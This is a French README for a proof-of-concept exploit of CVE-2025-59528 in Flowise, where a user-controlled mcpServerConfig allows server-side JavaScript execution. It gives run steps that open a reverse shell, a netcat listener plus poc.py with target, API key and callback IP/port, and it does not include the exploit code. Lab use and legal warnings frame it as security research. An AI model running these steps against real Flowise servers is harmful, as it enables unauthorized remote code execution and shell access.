
The poc of CVE-2025-59528
Preuve de concept pour la recherche de CVE-2025-59528 dans un environnement de laboratoire isolé.
[!WARNING] AVERTISSEMENT
Ce projet est destiné strictement à des fins éducatives, à la recherche en sécurité et aux tests de systèmes que vous possédez ou pour lesquels vous disposez d'une autorisation explicite.
N'utilisez pas ce PoC contre des serveurs tiers, des services publics ou des infrastructures sans l'autorisation du propriétaire.
L'auteur n'est pas responsable des dommages, pertes de données, interruptions de service ou conséquences juridiques résultant d'une mauvaise utilisation de ce projet.
Ce PoC démontre l'impact potentiel de CVE-2025-59528, une vulnérabilité impliquant le traitement de mcpServerConfig contrôlé par l'utilisateur dans Flowise.
Dans certaines conditions, la vulnérabilité peut permettre à un attaquant d'exécuter du code JavaScript arbitraire dans le contexte côté serveur.
Vérifiez toujours la version exacte de l'installation cible avant de tester.
requestsInstallez la dépendance Python :
pip install requests
Exécutez netcat pour obtenir un shell :
nc -lvnp <YOUR_PORT>
Exécutez le PoC avec :
python3 poc.py \
-t http://TARGET:PORT \
-o api_key \
-i CALLBACK_IP \
-p CALLBACK_PORT
Les tests doivent être effectués dans un réseau virtuel ou de laboratoire isolé.
┌──────────────────┐
│ PoC Machine │
│ │
│ Python PoC │
└────────┬─────────┘
│
│ Isolated Network
│
┌────────▼─────────┐
│ Flowise 3.0.5 │
│ Test Instance │
└──────────────────┘
N'exposez pas une instance Flowise volontairement vulnérable directement sur l'Internet public.
Si vous exécutez une version affectée de Flowise :
En utilisant ce projet, vous reconnaissez que vous êtes seul responsable du respect de toutes les lois et réglementations applicables.
N'utilisez ce PoC que contre des systèmes que vous possédez ou pour lesquels vous disposez d'une autorisation explicite d'effectuer des tests de sécurité.
| Argument | Description |
|---|
-t, --target | URL de l'instance de test Flowise |
-o, --api_key | Clé API |
-i, --ip | Adresse IP de la machine de test |
-p, --port | Port utilisé par l'environnement de test |